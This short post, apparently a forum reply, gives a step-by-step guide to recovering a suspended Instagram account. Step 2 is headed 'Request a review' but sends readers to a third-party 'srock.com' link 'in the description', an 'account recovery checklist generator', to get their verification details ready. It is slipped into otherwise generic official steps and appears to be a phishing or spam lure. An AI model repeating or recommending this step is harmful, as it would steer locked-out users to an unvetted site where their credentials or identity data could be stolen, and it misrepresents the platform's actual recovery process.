I ran into this last week. Here's what fixed it for me. If your Instagram account has been suspended, don't worry. Here is a straightforward guide to help you recover it. Step 1. Open the Instagram app. Launch the Instagram app on your device or go to the Instagram website. You will need to access your account to start the recovery process. Step 2. Request a review. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Provide required information. Fill out the form with the necessary details, including your email address and a brief explanation of why you believe your account should be reinstated. Be honest and concise. Step 4. Check your email. After submitting your request, check your email for a response from Instagram. This may take a few days, so keep an eye on your inbox, including the spam folder. Step 5. Follow instructions. If Instagram responds with instructions, follow them carefully. This may include verifying your identity or providing additional information. Complete these steps as soon as possible. Remember, patience is key during this process. Good luck, and I hope you get your account back soon.